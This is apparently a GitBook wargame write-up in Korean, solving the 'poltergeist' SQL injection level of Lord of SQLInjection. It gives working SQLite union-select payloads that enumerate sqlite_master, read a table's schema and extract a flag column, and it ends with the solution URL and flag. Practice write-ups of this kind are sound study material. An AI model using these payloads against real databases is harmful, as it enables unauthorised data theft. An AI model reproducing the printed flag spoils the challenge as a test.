📂
이동현 Donghyun Lee
  • Welcome!
  • Wargame
    • Webhacking.kr
      • old-01 (200)
      • old-02 (500)
      • old-03 (350)
      • old-04 (300)
      • old-05 (300)
      • old-06 (100)
      • old-07 (300)
      • old-08 (350)
      • old-09 (900)
      • old-10 (250)
      • old-11 (300)
      • old-12 (250)
      • old-13 (1000)
      • old-14 (100)
      • old-15 (50)
      • old-16 (100)
      • old-17 (100)
      • old-18 (100)
      • old-19 (150)
      • old-20 (200)
      • old-21 (250)
      • old-22 (500)
      • old-23 (200)
      • old-24 (100)
      • old-25 (150)
      • old-26 (100)
      • old-27 (150)
      • old-28 (500)
      • old-29 (400)
      • old-30 (350) : UNSOLVED
      • old-31 (150)
      • old-32 (150)
      • old-33 (200)
      • old-34 (400)
      • old-35 (350)
      • old-36 (200)
      • old-38 (100)
      • old-39 (100)
      • old-40 (500)
      • old-41 (250)
      • old-42 (200)
      • old-43 (250)
      • old-44 (500)
      • old-45 (550)
      • old-46 (300)
      • old-47 (150)
      • old-48 (350)
      • old-49 (300)
      • old-50 (450)
      • old-51 (250)
      • old-52 (400)
      • old-53 (350)
      • old-54 (100)
      • old-55 (400)
      • old-56 (250)
      • old-57 (600)
      • old-58 (150)
      • old-59 (200)
      • old-60 (300)
      • old-61 (200)
    • Lord of SQLInjection
      • gremlin
      • cobolt
      • goblin
      • orc
      • wolfman
      • darkelf
      • orge
      • troll
      • vampire
      • skeleton
      • golem
      • darkknight
      • bugbear
      • giant
      • assassin
      • succubus
      • zombie_assassin
      • nightmare
      • xavis
      • dragon
      • iron_golem
      • dark_eyes
      • hell_fire
      • evil_wizard
      • green_dragon
      • red_dragon
      • blue_dragon
      • frankenstein
      • phantom
      • ouroboros
      • zombie
      • alien
      • cthulhu
      • death
      • godzilla
      • cyclops
      • chupacabra
      • manticore
      • banshee
      • poltergeist
      • nessie
      • revenant
      • yeti
      • mummy
      • kraken
      • cerberus
      • siren
      • incubus
    • Pwnable.kr
      • Toddler's Bottle
        • fd - 1 pt
        • collision - 3 pt
        • bof - 5 pt
        • flag - 7 pt
        • passcode - 10 pt
  • CTF
    • AlexCTF 2017
      • [Crypto] CR3: What is this encryption?
      • [Crypto] CR4: Poor RSA
    • BSides San Francisco CTF 2017
      • [Crypto] []root
  • project
    • How to Find Container Platform Escape Bug
      • Docker
        • Install Docker
        • Run Container
        • Docker Basic Commands
        • Docker Compose
        • Build Docker Image
        • Docker Hub
        • Private Docker Registry
      • Kubernetes
        • Introduction to Kubernetes
        • Kubernetes Practice
      • PoC
  • Donghyun's Lifelog
Powered by GitBook
On this page

Was this helpful?

  1. Wargame
  2. Lord of SQLInjection

poltergeist

PreviousbansheeNextnessie

Last updated 5 years ago

Was this helpful?

첫 화면이다.

SQLite는 데이터베이스의 schema를 sqlite_master라는 테이블에 저장한다.

아래와 같이 pw에 ' union select tbl_name from sqlite_master-- 를 넣어 flag_{$hash} 테이블의 정확한 이름을 알 수 있다.

아래와 같이 pw에 ' union select sql from sqlite_master where tbl_name='flag_70c81d99'-- 를 넣어 flag_70c81d99 테이블에 해당하는 sql 컬럼의 값을 알 수 있다.

sql 컬럼은 해당 테이블을 생성하는 쿼리를 저장한다.

아래와 같이 pw에 ' union select flag_0876285c from flag_70c81d99-- 를 넣어 flag_70c81d99 테이블의 flag_0876285c 컬럼의 값을 알 수 있다.

이 값이 $poltergeistFlag 이므로 https://los.rubiya.kr/chall/poltergeist_a62c7abc7e6ce0080dbf0e14a07d1f1d.php?pw=FLAG{ea5d3bbdcc4aec9abe4a6a9f66eaaa13} 에 접속하면 문제가 풀린다.